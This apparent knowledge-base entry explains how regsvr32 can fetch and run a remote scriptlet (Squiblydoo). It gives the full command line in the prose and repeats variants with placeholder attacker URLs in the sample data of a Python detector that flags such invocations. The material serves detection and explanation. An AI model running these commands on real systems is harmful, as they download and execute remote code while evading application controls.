How can regsvr32 be abused to download and execute files from GitHub?
Regsvr32 can be pointed at a remotely hosted scriptlet (.sct) file, which is an XML wrapper around VBScript or JScript. A command such as `regsvr32 /u /s /i:https://raw.githubusercontent.com/.../downloadexec.sct scrobj.dll` makes regsvr32 load scrobj.dll (the Windows Script Component runtime) and call its DllInstall entry point with the string after `/i:`; scrobj.dll fetches that URL and runs the script in the scriptlet's registration block, which in turn launches PowerShell or VBScript to download and execute the real payload. `/s` suppresses message boxes, and `/u` only turns the call into an uninstall, which scrobj.dll still answers by fetching and running the scriptlet. Because regsvr32.exe is a signed Microsoft binary that is proxy-aware, the first stage is retrieved by a trusted process and the attacker never has to drop it as a file themselves, although the fetched scriptlet can still end up in the WinINet cache and the command line is highly distinctive (regsvr32 with `/i:` followed by a URL and scrobj.dll as the module). The technique is commonly known as Squiblydoo and is catalogued by MITRE ATT&CK as T1218.010. It is one of the methods detailed in Penetration Techniques - Multiple Methods for Downloading Files from GitHub; related approaches for hiding parameters are explored in Penetration Techniques - Parameter Hiding Techniques in Shortcut Files.
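The command line described above is what a defender will see in process-creation telemetry, so the natural check is a parser that flags regsvr32 invocations whose `/i:` argument is a URL or whose module is scrobj.dll. The script below is an added example, not code from the page or from the referenced Penetration Techniques write-ups; the `analyze_regsvr32` and `scan` names, the `SAMPLE_EVENTS` records and the GitHub path inside them are all constructed for the demo rather than taken from a real host. It handles the `-` and `/` switch forms, quoted paths and mixed case, and also reports a local `.sct` passed to `/i:` since the same loader works offline.

```python
"""Flag Squiblydoo-style regsvr32 abuse in process-creation command lines.

Added example for this page, not the page's own code. SAMPLE_EVENTS is
constructed test data, not telemetry from a real system.
"""
from __future__ import annotations

import re
from urllib.parse import urlparse

# One token per quoted string or whitespace-separated word. Windows does not
# use POSIX quoting rules, so a small regex is more faithful than shlex here.
_TOKEN_RE = re.compile(r'"[^"]*"|\S+')

_REMOTE_SCHEMES = ("http", "https", "ftp")


def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line into arguments, dropping surrounding quotes."""
    return [t.replace('"', "") for t in _TOKEN_RE.findall(cmdline)]


def _basename(path: str) -> str:
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_regsvr32(cmdline: str) -> list[str]:
    """Return the reasons a command line looks like regsvr32 scriptlet abuse.

    An empty list means the line is not regsvr32 at all, or carries none of
    the markers this check knows about.
    """
    toks = tokenize(cmdline)
    if not toks or _basename(toks[0]) not in ("regsvr32.exe", "regsvr32"):
        return []

    install_arg: str | None = None   # value given after /i: or -i:
    modules: list[str] = []          # non-switch arguments, i.e. the DLL(s)
    for t in toks[1:]:
        if t and t[0] in "/-":
            switch, _, value = t[1:].partition(":")
            if switch.lower() == "i":
                install_arg = value
        else:
            modules.append(t)

    reasons: list[str] = []
    if install_arg:
        # urlparse treats a drive letter ("C:") as a scheme, so compare against
        # an explicit allow-list of network schemes instead of "any scheme".
        if urlparse(install_arg).scheme.lower() in _REMOTE_SCHEMES:
            reasons.append(f"/i: points at a remote resource ({install_arg})")
        elif install_arg.lower().endswith(".sct"):
            reasons.append(f"/i: points at a local scriptlet ({install_arg})")
    if any(_basename(m) == "scrobj.dll" for m in modules):
        reasons.append("scrobj.dll passed as the module to register")
    return reasons


# Constructed process-creation events; the GitHub path is a placeholder.
SAMPLE_EVENTS = [
    {"pid": 4120, "CommandLine": r"regsvr32 /u /s /i:https://raw.githubusercontent.com/attacker/repo/main/downloadexec.sct scrobj.dll"},
    {"pid": 4188, "CommandLine": r'"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files\Vendor\vendor.dll"'},
    {"pid": 4200, "CommandLine": r"REGSVR32.EXE -n -i:http://10.0.0.5/a.sct SCROBJ.DLL"},
    {"pid": 4300, "CommandLine": r"cmd.exe /c echo regsvr32 scrobj.dll"},
]


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Run the check over a list of events and keep only the hits."""
    hits = []
    for e in events:
        reasons = analyze_regsvr32(e["CommandLine"])
        if reasons:
            hits.append((e["pid"], reasons))
    return hits


if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS):
        print(f"pid {pid}:")
        for r in reasons:
            print(f"  - {r}")
```

The legitimate vendor registration (pid 4188) produces no finding because it has neither a `/i:` URL nor scrobj.dll, while both the original Squiblydoo form and the dash-switch, upper-cased variant are caught on two independent markers. In production the same logic belongs on Sysmon Event ID 1 or Windows 4688 command lines, paired with a network-connection rule for regsvr32.exe, since an attacker can rename the scriptlet or host it on a non-GitHub server but cannot avoid handing regsvr32 a URL.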
Tags: regsvr32, scriptlet, .sct, JScript, VBScript, code execution, download file